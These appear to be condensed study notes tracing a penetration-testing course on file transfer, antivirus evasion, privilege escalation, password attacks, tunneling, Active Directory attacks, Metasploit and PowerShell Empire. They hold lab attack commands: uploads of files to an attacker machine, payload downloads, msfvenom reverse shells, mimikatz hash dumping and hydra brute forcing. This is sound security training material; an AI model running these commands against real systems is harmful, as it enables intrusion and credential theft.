16.2.1 Non-Interactive FTP Download
C:\Users\offsec> ftp -h
C:\Users\offsec> ftp -v -n -s:ftp.txt
16.2.2 Windows Downloads Using Scripting Languages
We can run this (with cscript) to download files from our Kali machine:
C:\Users\Offsec> cscript wget.vbs http://10.11.0.4/evil.exe evil.exe
Now we can use PowerShell to run the script and download our file.
C:\Users\Offsec> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
16.2.3 Windows Downloads with exe2hex and PowerShell
16.2.4 Windows Uploads Using Windows Scripting Languages
C:\Users\Offsec> powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')
16.2.5 Uploading Files with TFTP
kali@kali:~$ sudo apt update && sudo apt install atftp
kali@kali:~$ sudo mkdir /tftp
kali@kali:~$ sudo chown nobody: /tftp
kali@kali:~$ sudo atftpd --daemon --port 69 /tftp
C:\Users\Offsec> tftp -i 10.11.0.4 put important.docx

17. Antivirus Evasion
17.1 What is Antivirus Software
Antivirus (AV) is a type of application designed to prevent, detect, and remove malicious software. It was originally designed to simply remove computer viruses. However, with the development of other types of malware, antivirus software now typically includes additional protections such as firewalls, website scanners, and more.
17.2 Methods of Detecting Malicious Code
In order to demonstrate the effectiveness of various antivirus products, we will start by scanning a popular Meterpreter payload. Using msfvenom, we will generate a standard Portable Executable file containing our payload, in this case a simple TCP reverse shell.
17.2.1 Signature-Based Detection
17.2.2 Heuristic and Behavioral-Based Detection
17.3 Bypassing Antivirus Detection
Generally speaking, antivirus evasion falls into two broad categories: on-disk and in-memory.
17.3.1 On-Disk Evasion
17.3.1.1 Packers
Modern on-disk malware obfuscation can take many forms. One of the earliest ways of avoiding detection involved the use of packers
17.3.1.2 Obfuscators
17.3.1.3 Crypters
17.3.1.4 Software Protectors
17.3.2 In-Memory Evasion
17.3.2.1 Remote Process Memory Injection
17.3.2.2 Reflective DLL Injection
17.3.2.3 Process Hollowing
When using process hollowing to bypass antivirus software, attackers first launch a non-malicious process in a suspended state. Once launched, the image of the process is removed from memory and replaced with a malicious executable image. Finally, the process is then resumed and malicious code is executed instead of the legitimate process.
17.3.2.4 Inline Hooking
17.3.3 AV Evasion: Practical Example
We will install Avira Free Antivirus Version 15.0.34.16 on our Windows 10 client. The Avira installer can be found in the C:\Tools\antivirus_evasion\ directory. Once installed, we can check its configuration by searching for "Start Avira Antivirus" in the Windows 10 search bar:
17.3.3.1 PowerShell In-Memory Injection
kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f powershell
17.3.3.3 Shellter

18. Privilege Escalation
During a penetration test, we often gain an initial foothold on a system as a standard or non-privileged user. In these cases, we generally seek to gain additional access rights before we can demonstrate the full impact of the compromise. This process is referred to as privilege escalation and it is a necessary skill as "direct-to-root" compromises are arguably rare in modern environments.
18.1 Information Gathering
18.1.1 Manual Enumeration
18.1.1.1 Enumerating Users
C:\Users\student>net user
student@debian:~$ cat /etc/passwd
18.1.1.2 Enumerating the Hostname
C:\Users\student>hostname
18.1.1.3 Enumerating the Operating System Version and Architecture
C:\Users\student>systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
student@debian:~$ cat /etc/issue
18.1.1.4 Enumerating Running Processes and Services
C:\Users\student>tasklist /SVC
18.1.1.5 Enumerating Networking Information
Another step in the analysis of the target host is to review available network interfaces, routes, and open ports.
Windows:
C:\Users\student>ipconfig /all
C:\Users\student>route print
Finally, we can use netstat to view the active network connections. Specifying the -a flag will display all active TCP connections, the -n flag displays the address and port number in numerical form, and the -o flag will display the owner PID of each connection.
C:\Users\student>netstat -ano
Linux:
student@debian:~$ ip a
student@debian:~$ /sbin/route
We can display active network connections and listening ports with either netstat or ss, both of which accept the same arguments.
For example, we can list all connections with -a, avoid hostname resolution (which may stall the command execution) with -n, and list the process name the connection belongs to with -p. We can combine the arguments and simply run ss -anp:
student@debian:~$ ss -anp
18.1.1.6 Enumerating Firewall Status and Rules
C:\Users\student>netsh advfirewall show currentprofile
To look at the firewall rules:
C:\Users\student>netsh advfirewall firewall show rule name=all
18.1.1.7 Enumerating Scheduled Tasks
c:\Users\student>schtasks /query /fo LIST /v
student@debian:~$ ls -lah /etc/cron*
student@debian:~$ cat /etc/crontab
18.1.1.8 Enumerating Installed Applications and Patch Levels
c:\Users\student>wmic product get name, version, vendor
wmic can also be used to list system-wide updates by querying the Win32_QuickFixEngineering (qfe) WMI class.
c:\Users\student>wmic qfe get Caption, Description, HotFixID, InstalledOn
student@debian:~$ dpkg -l
18.1.1.9 Enumerating Readable/Writable Files and Directories
We will enumerate the Program Files directory in search of any file or directory that allows the Everyone group write permissions.
We will use -u to suppress errors, -w to search for write access permissions, and -s to perform a recursive search. The additional options are also worth exploring as this tool is quite useful.
c:\Tools\privilege_escalation\SysinternalsSuite>accesschk.exe -uws "Everyone" "C:\Program Files"
C:\Tools\privilege_escalation\SysinternalsSuite>Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
Linux:
student@debian:~$ find / -writable -type d 2>/dev/null
18.1.1.10 Enumerating Unmounted Disks
c:\Users\student>mountvol
student@debian:~$ cat /etc/fstab
student@debian:~$ /bin/lsblk
18.1.1.11 Enumerating Device Drivers and Kernel Modules
18.1.1.12 Enumerating Binaries That AutoElevate
On Windows systems, we should check the status of the AlwaysInstallElevated registry setting. If this key is enabled (set to 1) in either HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, any user can run Windows Installer packages with elevated privileges.
c:\Users\student>reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
Linux:
We can use the find command to search for SUID-marked binaries. In this case, we are starting our search at the root directory (/), looking for files (-type f) with the SUID bit set (-perm -u=s), and discarding all error messages (2>/dev/null):
student@debian:~$ find / -perm -u=s -type f 2>/dev/null
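As an added audit helper (my own code, not from the course), the same SUID/SGID search done in Python and compared against a constructed baseline, so that set-id files a build does not account for stand out for review; the baseline paths are an assumption and would be replaced with one captured from a trusted image.

```python
"""Audit SUID/SGID regular files against a known-good baseline.

Mirrors `find / -perm -u=s -type f 2>/dev/null`: unreadable directories are
skipped and symlinks are never followed. The baseline is constructed for the
example from binaries that are SUID on a stock Debian install."""
import os
import stat

BASELINE = {
    "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/newgrp",
}


def is_setid(mode):
    """True for a regular file whose SUID or SGID bit is set (mode from lstat)."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_setid_files(root="/"):
    """Walk root and return the sorted paths of set-id regular files."""
    hits = []
    # onerror swallows EACCES on directories we cannot list (the 2>/dev/null).
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink to a SUID file is not itself SUID
            except OSError:
                continue
            if is_setid(st.st_mode):
                hits.append(path)
    return sorted(hits)


def unexpected_setid(paths, baseline=BASELINE):
    """Set-id files the baseline does not account for: candidates for review."""
    return [p for p in paths if p not in baseline]


if __name__ == "__main__":
    for path in unexpected_setid(find_setid_files("/")):
        print("review:", path)
```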
18.1.2 Automated Enumeration
student@debian:~$ ./unix-privesc-check

18.2 Windows Privilege Escalation Examples
18.2.1 Understanding Windows Privileges and Integrity Levels
From Windows Vista onward, processes run on four integrity levels:
System integrity process: SYSTEM rights
High integrity process: administrative rights
Medium integrity process: standard user rights
Low integrity process: very restricted rights often used in sandboxed processes
18.2.2 Introduction to User Account Control (UAC)
c:\Users\admin>whoami /groups
C:\Users\admin> net user admin Ev!lpass
In order to change the admin user's password, we must switch to a high integrity level even if we are logged in with an administrative user. In our example, one way to do this is through powershell.exe with the Start-Process cmdlet specifying the "Run as administrator" option:
C:\Users\admin>powershell.exe Start-Process cmd.exe -verb runAs
18.2.3 User Account Control (UAC) Bypass: fodhelper.exe Case Study
18.2.4 Insecure File Permissions: Serviio Case Study
18.2.5 Leveraging Unquoted Service Paths
18.2.6 Windows Kernel Vulnerabilities: USBPcap Case Study
kali@kali:~# searchsploit USBPcap
18.2.6.1 Compiling C/C++ Code on Windows
18.3 Linux Privilege Escalation Examples
18.3.1 Understanding Linux Privileges
18.3.2 Insecure File Permissions: Cron Case Study
18.3.3 Insecure File Permissions: /etc/passwd Case Study
18.3.4 Kernel Vulnerabilities: CVE-2017-1000112 Case Study
18.3.4.1 Compiling C/C++ Code on Linux

19. Password Attacks
19.1 Wordlists
19.1.1 Standard Wordlists
John the Ripper

19.2 Brute Force Wordlists
Crunch, included with Kali Linux, is a powerful wordlist generator.
kali@kali:~$ crunch 8 8 -t ,@@^^%%%
This would consume a massive 160 GB of disk space.
We can also define a character set with crunch. For example, we can create a brute force wordlist accounting for passwords between four and six characters in length (4 6), containing only the characters 0-9 and A-F (0123456789ABCDEF), and we will write the output to a file (-o crunch.txt):
kali@kali:~$ crunch 4 6 0123456789ABCDEF -o crunch.txt
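An added keyspace estimator for the two crunch invocations above (my own helper, not crunch or course code): it counts the candidates and the bytes a -t pattern or a min/max charset run produces, so the size of a wordlist can be judged before it is written to disk. The placeholder classes follow crunch's -t syntax; the symbol set for ^ is assumed to be crunch's 33-character default.

```python
"""Estimate the keyspace and on-disk size of a crunch-style wordlist."""
import string
from itertools import product

# Placeholder classes of crunch's -t option; the symbol set is an assumption.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,                 # 26 lower-case letters
    ",": string.ascii_uppercase,                 # 26 upper-case letters
    "%": string.digits,                          # 10 digits
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ ",  # 33 symbols (assumed default)
}


def pattern_candidates(pattern):
    """Words produced by `crunch N N -t pattern`; a literal character is one fixed choice."""
    count = 1
    for ch in pattern:
        count *= len(PLACEHOLDERS.get(ch, ch))
    return count


def pattern_bytes(pattern):
    """On-disk size: every word is followed by a newline."""
    return pattern_candidates(pattern) * (len(pattern) + 1)


def charset_candidates(min_len, max_len, charset):
    """Words produced by `crunch min max charset`, summed over every length in range."""
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))


def charset_bytes(min_len, max_len, charset):
    return sum(len(charset) ** n * (n + 1) for n in range(min_len, max_len + 1))


def expand_pattern(pattern):
    """Enumerate the words of a small -t pattern, to show what the placeholders mean."""
    pools = [PLACEHOLDERS.get(ch, ch) for ch in pattern]
    return ("".join(combo) for combo in product(*pools))


def gib(nbytes):
    return round(nbytes / 1024 ** 3, 1)


if __name__ == "__main__":
    hexset = "0123456789ABCDEF"
    print(f",@@^^%%%: {pattern_candidates(',@@^^%%%'):,} words, {gib(pattern_bytes(',@@^^%%%'))} GiB")
    print(f"4-6 hex: {charset_candidates(4, 6, hexset):,} words, {gib(charset_bytes(4, 6, hexset))} GiB")
    print(list(expand_pattern("a%"))[:3])
```

The 8-character pattern comes out at 19,140,264,000 words and about 160 GiB, which is the figure the notes quote; the hex run is under 120 MiB.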

19.3 Common Network Service Attack Methods
19.3.1 HTTP htaccess Attack with Medusa
19.3.2 Remote Desktop Protocol Attack with Crowbar
kali@kali:~$ sudo apt install crowbar
To invoke crowbar, we will specify the protocol (-b), the target server (-s), a username (-u), a wordlist (-c), and the number of threads (-n) as shown in Listing 606:
kali@kali:~$ crowbar -b rdp -s 10.11.0.22/32 -u admin -c ~/password-file.txt -n 1
19.3.3 SSH Attack with THC-Hydra
We will attack our Kali VM. We will use the SSH protocol on our local machine (ssh://127.0.0.1), focus on the kali user (-l kali), and again use the rockyou wordlist (-P):
kali@kali:~$ hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1
19.3.4 HTTP POST Attack with THC-Hydra
kali@kali:~$ hydra 10.11.0.22 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vv -f
19.4 Leveraging Password Hashes
19.4.1 Retrieving Password Hashes
mimikatz: run it from an administrative command prompt. To extract password hashes:
C:\> C:\Tools\password_attacks\mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam
19.4.2 Passing the Hash in Windows
19.4.3 Password Cracking
Once we've gained access to password hashes from a target system, we can begin a password cracking session, running in the background, as we continue our assessment.
kali@kali:~$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
While John the Ripper is a great tool for cracking password hashes, its speed is limited to the power of the CPUs dedicated to the task. In recent years, Graphic Processing Units (GPUs) have become incredibly powerful and are, of course, found in every computer with a display.
In this example, we will run hashcat in benchmark mode (-b) on a machine with a GeForce GTX 1080 Ti GPU:
C:\Users\Cracker\hashcat-4.2.1> hashcat64.exe -b

20. Port Redirection and Tunneling
20.1 Port Forwarding
20.1.1 RINETD
We will use a port forwarding tool called rinetd.
kali@kali:~$ sudo apt update && sudo apt install rinetd
20.2 SSH Tunneling
20.2.1 SSH Local Port Forwarding
20.2.2 SSH Remote Port Forwarding
20.3 PLINK.exe
20.4 NETSH
20.5 HTTPTunnel-ing Through Deep Packet Inspection

21. Active Directory Attacks
21.1 Active Directory Theory
Active Directory consists of several components. The most important component is the domain controller (DC).
21.2 Active Directory Enumeration
21.2.1 Traditional Approach
C:\Users\Offsec.corp> net user
C:\Users\Offsec.corp> net user /domain
C:\Users\Offsec.corp> net group /domain
21.2.2 A Modern Approach
21.2.3 Resolving Nested Groups
21.2.4 Currently Logged on Users
21.2.5 Enumeration Through Service Principal Names
21.3 Active Directory Authentication
21.3.1 NTLM Authentication
21.3.2 Kerberos Authentication
21.3.3 Cached Credential Storage and Retrieval
21.3.4 Service Account Attacks
21.3.5 Low and Slow Password Guessing

21.4 Active Directory Lateral Movement
21.4.1 Pass the Hash
21.4.2 Overpass the Hash
21.4.3 Pass the Ticket
21.4.4 Distributed Component Object Model

21.5 Active Directory Persistence
21.5.1 Golden Tickets
21.5.2 Domain Controller Synchronization

22. The Metasploit Framework
22.1 Metasploit User Interfaces and Setup
22.1.1 Getting Familiar with MSF Syntax
22.1.2 Metasploit Database Access
22.1.3 Auxiliary Modules
22.2 Exploit Modules
22.2.1 SyncBreeze Enterprise
22.3 Metasploit Payloads
22.3.1 Staged vs Non-Staged Payloads
22.3.2 Meterpreter Payloads
22.3.3 Experimenting with Meterpreter
22.3.4 Executable Payloads
22.3.5 Metasploit Exploit Multi Handler
22.3.6 Client-Side Attacks
22.3.7 Advanced Features and Transports
22.4 Building Our Own MSF Module
22.5 Post-Exploitation with Metasploit
22.5.1 Core Post-Exploitation Features
22.5.2 Migrating Processes
22.5.3 Post-Exploitation Modules
22.5.4 Pivoting with the Metasploit Framework
22.6 Metasploit Automation
23. PowerShell Empire
Empire is a "PowerShell and Python post-exploitation agent" with a heavy focus on client-side exploitation and post-exploitation of Active Directory (AD) deployments.
23.1 Installation, Setup, and Usage
kali@kali:~$ cd /opt
kali@kali:/opt$ sudo git clone https://github.com/PowerShellEmpire/Empire.git
kali@kali:/opt/Empire$ sudo ./empire
23.1.2 Listeners and Stagers
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners) > set Host 10.11.0.4
(Empire: listeners/http) > execute
(Empire: listeners) > usestager
Empire supports stagers for Windows, Linux, and OS X. Windows stagers include support for standard DLLs, HTML Applications, Microsoft Office macros, and more exotic stagers such as windows/ducky for use with the USB Rubber Ducky.
(Empire: listeners) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Listener http
(Empire: stager/windows/launcher_bat) > execute
23.1.3 The Empire Agent

23.2 PowerShell Modules
23.2.1 Situational Awareness
23.2.2 Credentials and Privilege Escalation
23.2.3 Lateral Movement
Once we gain valid user credentials, we can use them to log into additional systems until we reach our objective. This is known as lateral movement.
23.3 Switching Between Empire and Metasploit
The Empire agent supports many features. However, there are often times when we need to use features that are only found in Metasploit. Since we can have both Empire and Metasploit shells on the same compromised host, this is actually quite easy.

24. Assembling the Pieces: Penetration Test Breakdown
24.1 Public Network Enumeration
We will begin by conducting a scan of the external host resolvable through the DNS name sandbox.local. To do this, we will use Nmap with the following command:
kali@kali:~$ sudo nmap -sC -sS -p0-65535 sandbox.local
24.2 Targeting the Web Application
24.2.1 Web Application Enumeration
kali@kali:~$ dirb http://sandbox.local
kali@kali:~$ wpscan --url sandbox.local --enumerate ap,at,cb,dbe
24.2.2 SQL Injection Exploitation
24.2.3 Cracking the Password
24.2.4 Enumerating the Admin Interface
24.2.5 Obtaining a Shell
24.2.6 Post-Exploitation Enumeration
24.2.7 Creating a Stable Pivot Point
24.3 Targeting the Database
24.3.1 Enumeration
24.3.1.1 Application/Service Enumeration
24.3.2 Attempting to Exploit the Database
24.4 Deeper Enumeration of the Web Application Server
24.4.1 More Thorough Post Exploitation
24.4.2 Privilege Escalation
24.4.3 Searching for DB Credentials
24.5 Targeting the Database Again
24.5.1 Exploitation
24.5.2 Post-Exploitation Enumeration
24.5.3 Creating a Stable Reverse Tunnel
24.6 Targeting Poultry
24.6.1 Enumeration
24.6.1.1 Network Enumeration
24.6.2 Exploitation (Or Just Logging In)
24.6.3 Post-Exploitation Enumeration
24.6.4 Unquoted Search Path Exploitation
24.6.5 Post-Exploitation Enumeration
24.7 Internal Network Enumeration
24.7.1 Reviewing the Results
24.8 Targeting the Jenkins Server
24.8.1 Application Enumeration
24.8.2 Exploiting Jenkins
24.8.3 Post Exploitation Enumeration
24.8.4 Privilege Escalation
24.8.5 Post Exploitation Enumeration
24.9 Targeting the Domain Controller
24.9.1 Exploiting the Domain Controller
With the ability to run commands as the domain administrator user, one way we can get access to the domain controller is by using the PowerShell New-PSSession cmdlet to open a new session against a remote host.